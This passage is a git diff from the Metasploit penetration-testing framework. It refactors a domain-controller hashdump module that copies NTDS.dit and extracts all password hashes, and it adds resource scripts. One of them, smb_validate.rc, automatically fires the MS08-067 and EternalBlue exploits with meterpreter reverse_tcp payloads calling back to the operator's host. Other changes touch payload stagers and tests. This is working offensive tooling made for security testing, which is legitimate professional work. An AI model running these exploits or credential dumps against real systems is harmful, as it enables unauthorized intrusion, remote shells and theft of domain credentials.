datastore['HttpProxyHost'].to_s + proxyport = datastore['HttpProxyPort'].to_s || "8080" if Rex::Socket.is_ipv6?(proxyhost) proxyhost = "[#{proxyhost}]" @@ -91,7 +91,7 @@ module MetasploitModule if proxyport == "80" proxyinfo = proxyhost end - if datastore['PayloadProxyType'].to_s == 'HTTP' + if datastore['HttpProxyType'].to_s == 'HTTP' proxyinfo = 'http://' + proxyinfo else #socks proxyinfo = 'socks=' + proxyinfo @@ -105,22 +105,22 @@ module MetasploitModule p[proxyloc-4] = [calloffset].pack('V')[0] # Authentication credentials have not been specified - if datastore['PayloadProxyUser'].to_s == '' or - datastore['PayloadProxyPass'].to_s == '' or - datastore['PayloadProxyType'].to_s == 'SOCKS' + if datastore['HttpProxyUser'].to_s == '' || + datastore['HttpProxyPass'].to_s == '' || + datastore['HttpProxyType'].to_s == 'SOCKS' jmp_offset = p.index("PROXY_AUTH_STOP") + 15 - p.index("PROXY_AUTH_START") # Remove the authentication code p = p.gsub(/PROXY_AUTH_START(.)*PROXY_AUTH_STOP/i, "") else - username_size_diff = 14 - datastore['PayloadProxyUser'].to_s.length - password_size_diff = 14 - datastore['PayloadProxyPass'].to_s.length + username_size_diff = 14 - datastore['HttpProxyUser'].to_s.length + password_size_diff = 14 - datastore['HttpProxyPass'].to_s.length jmp_offset = 16 + # PROXY_AUTH_START length 15 + # PROXY_AUTH_STOP length - username_size_diff + # Difference between datastore PayloadProxyUser length and db "PayloadProxyUser length" - password_size_diff # Same with PayloadProxyPass + username_size_diff + # Difference between datastore HttpProxyUser length and db "HttpProxyUser length" + password_size_diff # Same with HttpProxyPass # Patch call offset username_loc = p.index("PROXY_USERNAME") @@ -131,8 +131,8 @@ module MetasploitModule # Remove markers & change login/password p = p.gsub("PROXY_AUTH_START","") p = p.gsub("PROXY_AUTH_STOP","") - p = p.gsub("PROXY_USERNAME", datastore['PayloadProxyUser'].to_s) - p = p.gsub("PROXY_PASSWORD", datastore['PayloadProxyPass'].to_s) + p = p.gsub("PROXY_USERNAME", datastore['HttpProxyUser'].to_s) + p = p.gsub("PROXY_PASSWORD", datastore['HttpProxyPass'].to_s) end # Patch jmp dbl_get_server_host diff --git a/modules/payloads/stagers/windows/reverse_winhttp.rb b/modules/payloads/stagers/windows/reverse_winhttp.rb index eb634588de..fd0d496261 100644 --- a/modules/payloads/stagers/windows/reverse_winhttp.rb +++ b/modules/payloads/stagers/windows/reverse_winhttp.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/windows/reverse_winhttp' module MetasploitModule - CachedSize = 357 + CachedSize = 520 include Msf::Payload::Stager include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/reverse_winhttps.rb b/modules/payloads/stagers/windows/reverse_winhttps.rb index a7784e0c4c..07726c00c3 100644 --- a/modules/payloads/stagers/windows/reverse_winhttps.rb +++ b/modules/payloads/stagers/windows/reverse_winhttps.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/windows/reverse_winhttps' module MetasploitModule - CachedSize = 377 + CachedSize = 542 include Msf::Payload::Stager include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/x64/reverse_http.rb b/modules/payloads/stagers/windows/x64/reverse_http.rb index 6a2686cc83..624fc33a65 100644 --- a/modules/payloads/stagers/windows/x64/reverse_http.rb +++ b/modules/payloads/stagers/windows/x64/reverse_http.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/windows/x64/reverse_http' module MetasploitModule - CachedSize = 520 + CachedSize = 529 include Msf::Payload::Stager include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/x64/reverse_https.rb b/modules/payloads/stagers/windows/x64/reverse_https.rb index d11003e5f5..7cee13664a 100644 --- a/modules/payloads/stagers/windows/x64/reverse_https.rb +++ b/modules/payloads/stagers/windows/x64/reverse_https.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/windows/x64/reverse_https' module MetasploitModule - CachedSize = 551 + CachedSize = 563 include Msf::Payload::Stager include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/x64/reverse_winhttp.rb b/modules/payloads/stagers/windows/x64/reverse_winhttp.rb index 3ee66da58d..3571790029 100644 --- a/modules/payloads/stagers/windows/x64/reverse_winhttp.rb +++ b/modules/payloads/stagers/windows/x64/reverse_winhttp.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/windows/x64/reverse_winhttp' module MetasploitModule - CachedSize = 532 + CachedSize = 746 include Msf::Payload::Stager include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/x64/reverse_winhttps.rb b/modules/payloads/stagers/windows/x64/reverse_winhttps.rb index 0a70268db0..2ed98e3f61 100644 --- a/modules/payloads/stagers/windows/x64/reverse_winhttps.rb +++ b/modules/payloads/stagers/windows/x64/reverse_winhttps.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/windows/x64/reverse_winhttps' module MetasploitModule - CachedSize = 563 + CachedSize = 782 include Msf::Payload::Stager include Msf::Payload::Windows diff --git a/modules/post/multi/manage/shell_to_meterpreter.rb b/modules/post/multi/manage/shell_to_meterpreter.rb index fd865392db..1a69f54bd7 100644 --- a/modules/post/multi/manage/shell_to_meterpreter.rb +++ b/modules/post/multi/manage/shell_to_meterpreter.rb @@ -52,11 +52,6 @@ class MetasploitModule < Msf::Post def run print_status("Upgrading session ID: #{datastore['SESSION']}") - if session.type =~ /meterpreter/ - print_error("Shell is already Meterpreter.") - return nil - end - # Try hard to find a valid LHOST value in order to # make running 'sessions -u' as robust as possible. if datastore['LHOST'] diff --git a/modules/post/windows/gather/credentials/domain_hashdump.rb b/modules/post/windows/gather/credentials/domain_hashdump.rb index e695f9a9ae..47001bae5e 100644 --- a/modules/post/windows/gather/credentials/domain_hashdump.rb +++ b/modules/post/windows/gather/credentials/domain_hashdump.rb @@ -12,25 +12,35 @@ class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::ShadowCopy include Msf::Post::File + include Msf::Post::Windows::ExtAPI - def initialize(info={}) - super(update_info(info, - 'Name' => 'Windows Domain Controller Hashdump', - 'Description' => %q{ + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Windows Domain Controller Hashdump', + 'Description' => %q( This module attempts to copy the NTDS.dit database from a live Domain Controller and then parse out all of the User Accounts. It saves all of the captured password hashes, including historical ones. - }, - 'License' => MSF_LICENSE, - 'Author' => ['theLightCosine'], - 'Platform' => [ 'win' ], - 'SessionTypes' => [ 'meterpreter' ] - )) - deregister_options('SMBUser','SMBPass', 'SMBDomain') + ), + 'License' => MSF_LICENSE, + 'Author' => ['theLightCosine'], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ] + ) + ) + deregister_options('SMBUser', 'SMBPass', 'SMBDomain') + register_options( + [OptBool.new( + 'CLEANUP', [ true, 'Automatically delete ntds backup created', true] + )] + ) end def run if preconditions_met? + print_status "Pre-conditions met, attempting to copy NTDS.dit" ntds_file = copy_database_file unless ntds_file.nil? file_stat = client.fs.file.stat(ntds_file) @@ -38,39 +48,52 @@ class MetasploitModule < Msf::Post print_status "Repairing NTDS database after copy..." print_status repair_ntds(ntds_file) realm = sysinfo["Domain"] - ntds_parser = Metasploit::Framework::NTDS::Parser.new(client, ntds_file) - print_status "Started up NTDS channel. Preparing to stream results..." - ntds_parser.each_account do |ad_account| - print_good ad_account.to_s - report_hash(ad_account.ntlm_hash.downcase, ad_account.name, realm) - ad_account.nt_history.each_with_index do |nt_hash, index| - hash_string = ad_account.lm_history[index] || Metasploit::Credential::NTLMHash::BLANK_LM_HASH - hash_string << ":#{nt_hash}" - report_hash(hash_string.downcase,ad_account.name, realm) + begin + ntds_parser = Metasploit::Framework::NTDS::Parser.new(client, ntds_file) + rescue Rex::Post::Meterpreter::RequestError => e + print_bad("Failed to properly parse database: #{e}") + if e.to_s.include? "1004" + print_bad("Error 1004 is likely a jet database error because the ntds database is not in the regular format") end end - print_status "Deleting backup of NTDS.dit at #{ntds_file}" - rm_f(ntds_file) + unless ntds_parser.nil? + print_status "Started up NTDS channel. Preparing to stream results..." + ntds_parser.each_account do |ad_account| + print_good ad_account.to_s + report_hash(ad_account.ntlm_hash.downcase, ad_account.name, realm) + ad_account.nt_history.each_with_index do |nt_hash, index| + hash_string = ad_account.lm_history[index] || Metasploit::Credential::NTLMHash::BLANK_LM_HASH + hash_string << ":#{nt_hash}" + report_hash(hash_string.downcase, ad_account.name, realm) + end + end + end + if datastore['cleanup'] + print_status "Deleting backup of NTDS.dit at #{ntds_file}" + rm_f(ntds_file) + else + print_bad "#{ntds_file} requires manual cleanup" + end end end end def copy_database_file database_file_path = nil - if start_vss - case sysinfo["OS"] - when /2003| \.NET/ - database_file_path = vss_method - when /2008|2012/ - database_file_path = ntdsutil_method - else - print_error "This version of Windows is unsupported" - end + case sysinfo["OS"] + when /2003| \.NET/ + print_status "Using Volume Shadow Copy Method" + database_file_path = vss_method + when /2008|2012|2016/ + print_status "Using NTDSUTIL method" + database_file_path = ntdsutil_method + else + print_error "This version of Windows is unsupported" end database_file_path end - def is_domain_controller? + def domain_controller? if ntds_location file_exist?("#{ntds_location}\\ntds.dit") else @@ -79,13 +102,13 @@ class MetasploitModule < Msf::Post end def ntds_location - @ntds_location ||= registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\services\\NTDS\\Parameters\\","DSA Working Directory") + @ntds_location ||= registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\services\\NTDS\\Parameters\\", "DSA Working Directory") end def ntdsutil_method - tmp_path = "#{get_env("%WINDIR%")}\\Temp\\#{Rex::Text.rand_text_alpha((rand(8)+6))}" + tmp_path = "#{get_env('%WINDIR%')}\\Temp\\#{Rex::Text.rand_text_alpha((rand(8) + 6))}" command_arguments = "\"activate instance ntds\" \"ifm\" \"Create Full #{tmp_path}\" quit quit" - result = cmd_exec("ntdsutil.exe", command_arguments,90) + result = cmd_exec("ntdsutil.exe", command_arguments, 90) if result.include? "IFM media created successfully" file_path = "#{tmp_path}\\Active Directory\\ntds.dit" print_status "NTDS database copied to #{file_path}" @@ -97,23 +120,27 @@ class MetasploitModule < Msf::Post file_path end - def preconditions_met? - unless is_admin? + if is_admin? + print_status "Session has Admin privs" + else print_error "This module requires Admin privs to run" return false end - unless is_domain_controller? + if domain_controller? + print_status "Session is on a Domain Controller" + else print_error "This does not appear to be an AD Domain Controller" return false end unless session_compat? return false end + load_extapi return true end - def repair_ntds(path='') + def repair_ntds(path = '') arguments = "/p /o \"#{path}\"" cmd_exec("esentutl", arguments) end @@ -144,13 +171,16 @@ class MetasploitModule < Msf::Post end def vss_method + unless start_vss + fail_with(Failure::NoAccess, "Unable to start VSS service") + end location = ntds_location.dup - volume = location.slice!(0,3) - id = create_shadowcopy("#{volume}") + volume = location.slice!(0, 3) + id = create_shadowcopy('#{volume}') print_status "Getting Details of ShadowCopy #{id}" sc_details = get_sc_details(id) sc_path = "#{sc_details['DeviceObject']}\\#{location}\\ntds.dit" - target_path = "#{get_env("%WINDIR%")}\\Temp\\#{Rex::Text.rand_text_alpha((rand(8)+6))}" + target_path = "#{get_env('%WINDIR%')}\\Temp\\#{Rex::Text.rand_text_alpha((rand(8) + 6))}" print_status "Moving ntds.dit to #{target_path}" move_file(sc_path, target_path) target_path diff --git a/scripts/meterpreter/search_dwld.rb b/scripts/meterpreter/search_dwld.rb index bfdfe212ae..a51eed05bb 100644 --- a/scripts/meterpreter/search_dwld.rb +++ b/scripts/meterpreter/search_dwld.rb @@ -91,7 +91,7 @@ filter = args[1] || "office" # Set the regexp if filter == 'free' if args[2].nil? - raise RuntimeError.new("free filter requires pattern argument") + raise "free filter requires pattern argument" end $motif = args[2] else @@ -99,7 +99,7 @@ else end if $motif.nil? - raise RuntimeError.new("Unrecognized filter") + raise "Unrecognized filter" end # Search and download diff --git a/scripts/resource/dev_checks.rc b/scripts/resource/dev_checks.rc new file mode 100644 index 0000000000..9cecf722d2 --- /dev/null +++ b/scripts/resource/dev_checks.rc @@ -0,0 +1,112 @@ + + +# +# This resource script will check for vulnerabilities related to +# programs and services used by developers, including the following: +# +# * NodeJS debug (multi/misc/nodejs_v8_debugger) +# * distcc (unix/misc/distcc_exe) +# * Jenkins (linux/misc/jenkins_java_deserialize) +# * GitHub Enterprise (linux/http/github_enterprise_secret) +# +# It is worth noting that ONLY CHECKS are performed, no active exploiting. +# This makes it safe to run in many environments. +# +# Authors: +# * pbarry-r7 +# * dmohanty-r7 +# + +@job_ids = [] + +def wait_until_jobs_done + loop do + @job_ids.each do |job_id| + current_job_ids = framework.jobs.keys.map { |e| e.to_i } + sleep 1 if current_job_ids.include?(job_id) + end + + return + end +end + +def run_scanner(host:, mod_name:) + begin + mod = framework.auxiliary.create(mod_name) + mod.datastore['RHOSTS'] = host.address + print_line("Running the #{mod.name}...") + result = mod.run_simple({'RunAsJob': true, 'LocalOutput': self.output}) + rescue ::Exception => e + print_error(e.message) + end +end + +def check_exploit(host:, mod_name:, vuln_check_ret_val:) + begin + mod = framework.exploits.create(mod_name) + mod.datastore['RHOST'] = host.address + print_line("Looking for #{mod.name}...") + result = mod.check_simple({'RunAsJob': true, 'LocalOutput': self.output}) + @job_ids << mod.job_id if mod.job_id + if vuln_check_ret_val.index(result) + print_line("HOST #{host.address} APPEARS VULNERABLE TO #{mod.name}") + framework.db.report_vuln( + workspace: mod.workspace, + host: mod.rhost, + name: mod.name, + info: "This was flagged as likely vulnerable by the explicit check of #{mod.fullname}.", + refs: mod.references + ) + end + rescue ::Exception => e + print_error(e.message) + end +end + +def setup + # Test and see if we have a database connected + if not (framework.db and framework.db.active) + print_error("Database connection isn't established") + return false + end + + run_single("setg verbose true") + + true +end + +def main + framework.db.workspace.hosts.each do |host| + print_line("Checking IP: #{host.address}, OS: #{host.os_name}...") + + # Modules + { 'multi/misc/nodejs_v8_debugger': [ Exploit::CheckCode::Appears ], + 'unix/misc/distcc_exec': [ Exploit::CheckCode::Vulnerable ], + 'unix/misc/qnx_qconn_exec': [ Exploit::CheckCode::Vulnerable ], + 'linux/misc/jenkins_java_deserialize': [ Exploit::CheckCode::Vulnerable ], + 'linux/http/github_enterprise_secret': [ Exploit::CheckCode::Vulnerable ], + 'multi/http/traq_plugin_exec': [ Exploit::CheckCode::Appears ], + 'multi/http/builderengine_upload_exec': [ Exploit::CheckCode::Appears ], + 'multi/http/mantisbt_php_exec': [ Exploit::CheckCode::Appears ], + 'multi/http/vbulletin_unserialize': [ Exploit::CheckCode::Appears ], + 'unix/webapp/vbulletin_vote_sqli_exec': [ Exploit::CheckCode::Appears ], + 'multi/misc/java_jmx_server': [ Exploit::CheckCode::Appears, + Exploit::CheckCode::Detected ] }.each do |mod,ret_val| + check_exploit(host: host, + mod_name: mod.to_s, + vuln_check_ret_val: ret_val) + end + + # Scanners + [ 'scanner/misc/java_rmi_server' ].each do |mod| + run_scanner(host: host, mod_name: mod.to_s) + end + end + + wait_until_jobs_done +end + +abort("Error during setup, exiting.") unless setup +main + + diff --git a/scripts/resource/smb_checks.rc b/scripts/resource/smb_checks.rc new file mode 100644 index 0000000000..ab2276f517 --- /dev/null +++ b/scripts/resource/smb_checks.rc @@ -0,0 +1,108 @@ + + +# +# This resource scripts will check common security concerns on SMB for Windows. +# Specifically, this script will check for these things: +# +# * MS08-067. +# * MS17-010. +# * SMB version 1. +# +# For extra validation, you may try the smb_validate.rc script. +# +# Author: +# sinn3r +# + +@job_ids = [] + +def wait_until_jobs_done + while true + @job_ids.each do |job_id| + current_job_ids = framework.jobs.keys.map { |e| e.to_i } + sleep 1 if current_job_ids.include?(job_id) + end + + return + end +end + +def check_ms17_010(host, serv) + print_status("Checking MS17-010 on #{host.address}") + mod = framework.modules.create('auxiliary/scanner/smb/smb_ms17_010') + mod.datastore['RHOSTS'] = host.address + mod.datastore['RPORT'] = serv.port + mod.run_simple({ 'RunAsJob' => true, 'LocalOutput' => self.output }) + print_status("MS17-010 job ID for target #{host.address} is: #{mod.job_id}") + @job_ids << mod.job_id +end + +def check_ms08_067_netapi(host, serv) + print_status("Checking MS08-067 on #{host.address}") + mod = framework.exploits.create('windows/smb/ms08_067_netapi') + mod.datastore['RHOST'] = host.address + begin + check_code = mod.check_simple({ 'RunAsJob' => true, 'LocalOutput' => self.output }) + if mod.job_id + print_status("MS08-067 job ID for target #{host.address} is: #{mod.job_id}") + @job_ids << mod.job_id + end + + if check_code == Msf::Exploit::CheckCode::Vulnerable + framework.db.report_vuln( + workspace: mod.workspace, + host: mod.rhost, + name: mod.name, + info: "This was flagged as vulnerable by the explicit check of #{mod.fullname}.", + refs: mod.references + ) + end + rescue ::Exception => e + print_error(e.message) + end +end + +def check_smbv1(host, serv) + print_status("Checking SMBv1 on #{host.address}") + mod = framework.modules.create('auxiliary/scanner/smb/smb1') + mod.datastore['RHOSTS'] = host.address + mod.datastore['RPORT'] = serv.port + mod.run_simple({ 'RunAsJob' => true, 'LocalOutput' => self.output }) + print_status("SMBv1 check job ID for target #{host.address} is: #{mod.job_id}") + @job_ids << mod.job_id +end + +def is_smb?(host, serv) + return false unless serv.host + return false if serv.state != Msf::ServiceState::Open + return false if serv.port != 445 + true +end + +def do_checks + print_status("Number of hosts to check: #{framework.db.workspace.hosts.length}") + framework.db.workspace.hosts.each do |host| + host.services.each do |serv| + next unless is_smb?(host, serv) + print_status("Checking #{host.address}:#{serv.port} (#{serv.name})") + check_smbv1(host, serv) + check_ms17_010(host, serv) + check_ms08_067_netapi(host, serv) + end + end +end + +def setup + run_single("setg verbose true") +end + +def main + print_status('Performing checks...') + do_checks + wait_until_jobs_done +end + +setup +main + + \ No newline at end of file diff --git a/scripts/resource/smb_validate.rc b/scripts/resource/smb_validate.rc new file mode 100644 index 0000000000..1df6c51c23 --- /dev/null +++ b/scripts/resource/smb_validate.rc @@ -0,0 +1,157 @@ + + +# +# This resource script will attempt to exploit the following vulnerabilities: +# +# * MS08-067 +# * MS17-010 +# +# It works best if you can pair it with the smb_checks.rc script. +# +# Author: +# sinn3r +# + +@job_ids = [] + +def wait_until_jobs_done + while true + @job_ids.each do |job_id| + current_job_ids = framework.jobs.keys.map { |e| e.to_i } + sleep 1 if current_job_ids.include?(job_id) + end + + return + end +end + +def ms08_067_netapi_mod + framework.exploits.create('windows/smb/ms08_067_netapi') +end + +def ms17_010_mod + framework.exploits.create('windows/smb/ms17_010_eternalblue') +end + +def is_port_open?(port) + begin + sock = Socket.new(Socket::Constants::AF_INET, Socket::Constants::SOCK_STREAM, 0) + sock.bind(Socket.pack_sockaddr_in(port, get_lhost)) + rescue + return false + ensure + sock.close if sock && sock.kind_of?(Socket) + end + + true +end + +def get_x86_meterpreter_port + port_range = (4000..65535) + port_range.each do |port| + return port if is_port_open?(port) + end + + raise RuntimeError, 'Unable to find a meterpreter port' +end + +def get_x64_meterpreter_port + port_range = (3000..65535) + port_range.each do |port| + return port if is_port_open?(port) + end + + raise RuntimeError, 'Unable to find a meterpreter port' +end + +def get_x86_payload_name + 'windows/meterpreter/reverse_tcp' +end + +def get_x64_payload_name + 'windows/x64/meterpreter/reverse_tcp' +end + +def get_lhost + framework.datastore['LHOST'] +end + +def validate_ms08_067(vuln) + mod = ms08_067_netapi_mod + mod.datastore['RHOST'] = vuln.host.address + mod.datastore['RPORT'] = vuln.service ? vuln.service.port : 445 + mod.datastore['PAYLOAD'] = get_x86_payload_name + mod.datastore['LHOST'] = get_lhost + mod.datastore['LPORT'] = get_x86_meterpreter_port + print_status("Validating MS08-067 on #{mod.datastore['RHOST']}:#{mod.datastore['RPORT']} with #{mod.datastore['PAYLOAD']} on port #{mod.datastore['LPORT']}") + begin + mod.exploit_simple({ + 'LocalOutput' => self.output, + 'RunAsJob' => true, + 'Payload' => get_x86_payload_name + }) + @job_ids << mod.job_id + rescue ::Exception => e + print_error(e.message) + end +end + +def validate_ms17_010(vuln) + mod = ms17_010_mod + mod.datastore['RHOST'] = vuln.host.address + mod.datastore['RPORT'] = vuln.service ? vuln.service.port : 445 + mod.datastore['PAYLOAD'] = get_x64_payload_name + mod.datastore['LHOST'] = get_lhost + mod.datastore['LPORT'] = get_x64_meterpreter_port + print_status("Validating MS17-010 on #{mod.datastore['RHOST']}:#{mod.datastore['RPORT']} with #{mod.datastore['PAYLOAD']} on port #{mod.datastore['LPORT']}") + begin + mod.exploit_simple({ + 'LocalOutput' => self.output, + 'RunAsJob' => true, + 'Payload' => get_x64_payload_name + }) + @job_ids << mod.job_id + rescue ::Exception => e + print_error(e.message) + end +end + +def is_smb?(host, serv) + return false unless serv.host + return false if serv.state != Msf::ServiceState::Open + return false if serv.port != 445 + true +end + +def do_validation + framework.db.workspace.vulns.each do |vuln| + case vuln.name + when /MS17\-010/i + validate_ms17_010(vuln) + when /MS08\-067/i + validate_ms08_067(vuln) + end + end +end + +def setup + run_single("setg verbose true") +end + +def main + if framework.datastore['LHOST'] + print_status('Performing validation...') + begin + do_validation + wait_until_jobs_done + rescue RuntimeError => e + print_error(e.message) + print_error("Unable to do validation") + end + end +end + +setup +main + + \ No newline at end of file diff --git a/spec/lib/msf/core/exploit/powershell_spec.rb b/spec/lib/msf/core/exploit/powershell_spec.rb index 402ee98d67..ef6b4ca487 100644 --- a/spec/lib/msf/core/exploit/powershell_spec.rb +++ b/spec/lib/msf/core/exploit/powershell_spec.rb @@ -276,11 +276,13 @@ RSpec.describe Msf::Exploit::Powershell do end it 'shouldnt shorten args' do code = subject.cmd_psh_payload(payload, arch) - expect(code.include?('-NoProfile -WindowStyle hidden -Command')).to be_truthy + expect(code.include?('-NoProfile ')).to be_truthy + expect(code.include?('-WindowStyle hidden')).to be_truthy + expect(code.include?('-Command ')).to be_truthy end it 'should include -NoExit' do code = subject.cmd_psh_payload(payload, arch) - expect(code.include?('-NoProfile -WindowStyle hidden -NoExit -Command')).to be_truthy + expect(code.include?('-NoExit ')).to be_truthy end end @@ -311,14 +313,9 @@ RSpec.describe Msf::Exploit::Powershell do subject.datastore['Powershell::method'] = 'msil' subject.options.validate(subject.datastore) end - it 'should raise an exception' do - except = false - begin - subject.cmd_psh_payload(payload, arch) - rescue RuntimeError - except = true - end - expect(except).to be_truthy + it 'should generate a command line' do + code = subject.cmd_psh_payload(payload, arch) + expect(decompress(code).include?('System.Reflection.MethodInfo')).to be_truthy end end @@ -394,10 +391,10 @@ RSpec.describe Msf::Exploit::Powershell do end end - context 'when use single quotes' do - it 'should wrap in single quotes' do - code = subject.cmd_psh_payload(payload, arch, {:use_single_quotes => true}) - expect(code.include?(' -c \'')).to be_truthy + context 'when wrap double quotes' do + it 'should wrap in double quotes' do + code = subject.cmd_psh_payload(payload, arch, {:wrap_double_quotes => true}) + expect(code.include?(' -c "')).to be_truthy end end end @@ -447,7 +444,8 @@ RSpec.describe Msf::Exploit::Powershell do [:sta, true], [:noprofile, true], [:windowstyle, "hidden"], - [:command, "Z"] + [:command, "Z"], + [:wrap_double_quotes, true] ] permutations = (0..command_args.length).to_a.combination(2).map{|i,j| command_args[i...j]} @@ -462,20 +460,21 @@ RSpec.describe Msf::Exploit::Powershell do opts[:shorten] = false long_args = subject.generate_psh_args(opts) - opt_length = opts.length - 1 - expect(short_args).not_to be_nil expect(long_args).not_to be_nil - expect(short_args.count('-')).to eql opt_length - expect(long_args.count('-')).to eql opt_length expect(short_args[0]).not_to eql " " expect(long_args[0]).not_to eql " " expect(short_args[-1]).not_to eql " " expect(long_args[-1]).not_to eql " " if opts[:command] - expect(long_args[-10..-1]).to eql "-Command Z" - expect(short_args[-4..-1]).to eql "-c Z" + if opts[:wrap_double_quotes] + expect(long_args[-12..-1]).to eql "-Command \"Z\"" + expect(short_args[-6..-1]).to eql "-c \"Z\"" + else + expect(long_args[-10..-1]).to eql "-Command Z" + expect(short_args[-4..-1]).to eql "-c Z" + end end end end diff --git a/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb b/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb index d62f208a17..7bccc9b9cc 100644 --- a/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb +++ b/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb @@ -125,6 +125,7 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do " -a,--add Add the hosts instead of searching", " -d,--delete Delete the hosts instead of searching", " -c Only show the given columns (see list below)", + " -C Only show the given columns until the next restart (see list below)", " -h,--help Show this help information", " -u,--up Only show hosts which are up", " -o Send output to a file in csv format", diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb index 5fc0730837..04eb3245c4 100644 --- a/spec/modules/payloads_spec.rb +++ b/spec/modules/payloads_spec.rb @@ -2370,6 +2370,16 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'python/meterpreter_reverse_tcp' end + context 'python/shell_bind_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/python/shell_bind_tcp' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'python/shell_bind_tcp' + end + context 'python/shell_reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ @@ -4374,6 +4384,36 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'linux/ppc/meterpreter_reverse_https' end + context 'linux/ppce500v2/meterpreter_reverse_http' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/ppce500v2/meterpreter_reverse_http' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/ppce500v2/meterpreter_reverse_http' + end + + context 'linux/ppce500v2/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/ppce500v2/meterpreter_reverse_https' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/ppce500v2/meterpreter_reverse_https' + end + + context 'linux/ppce500v2/meterpreter_reverse_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/ppce500v2/meterpreter_reverse_tcp' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/ppce500v2/meterpreter_reverse_tcp' + end + context 'linux/ppc64le/meterpreter_reverse_http' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ diff --git a/spec/spec_helper.rb b/spec/spec_helper.rb index 0859ab6424..a5b1cfc002 100644 --- a/spec/spec_helper.rb +++ b/spec/spec_helper.rb @@ -3,10 +3,6 @@ require 'stringio' ENV['RAILS_ENV'] = 'test' -unless Bundler.settings.without.include?(:coverage) - require 'simplecov' -end - # @note must be before loading config/environment because railtie needs to be loaded before # `Metasploit::Framework::Application.initialize!` is called. # diff --git a/tools/modules/generate_mettle_payloads.rb b/tools/modules/generate_mettle_payloads.rb index 967a051b81..3e3c627562 100755 --- a/tools/modules/generate_mettle_payloads.rb +++ b/tools/modules/generate_mettle_payloads.rb @@ -12,18 +12,19 @@ schemes = [ ] arches = [ - ['aarch64','Linux', 'aarch64-linux-musl'], - ['armbe', 'Linux', 'armv5b-linux-musleabi'], - ['armle', 'Linux', 'armv5l-linux-musleabi'], - ['mips64', 'Linux', 'mips64-linux-muslsf'], - ['mipsbe', 'Linux', 'mips-linux-muslsf'], - ['mipsle', 'Linux', 'mipsel-linux-muslsf'], - ['ppc', 'Linux', 'powerpc-linux-muslsf'], - ['ppc64le','Linux', 'powerpc64le-linux-musl'], - ['x64', 'Linux', 'x86_64-linux-musl'], - ['x86', 'Linux', 'i486-linux-musl'], - ['zarch', 'Linux', 's390x-linux-musl'], - ['x64', 'OSX', 'x86_64-apple-darwin'], + ['aarch64', 'Linux', 'aarch64-linux-musl'], + ['armbe', 'Linux', 'armv5b-linux-musleabi'], + ['armle', 'Linux', 'armv5l-linux-musleabi'], + ['mips64', 'Linux', 'mips64-linux-muslsf'], + ['mipsbe', 'Linux', 'mips-linux-muslsf'], + ['mipsle', 'Linux', 'mipsel-linux-muslsf'], + ['ppc', 'Linux', 'powerpc-linux-muslsf'], + ['ppce500v2', 'Linux', 'powerpc-e500v2-linux-musl'], + ['ppc64le', 'Linux', 'powerpc64le-linux-musl'], + ['x64', 'Linux', 'x86_64-linux-musl'], + ['x86', 'Linux', 'i486-linux-musl'], + ['zarch', 'Linux', 's390x-linux-musl'], + ['x64', 'OSX', 'x86_64-apple-darwin'], ] arch = ''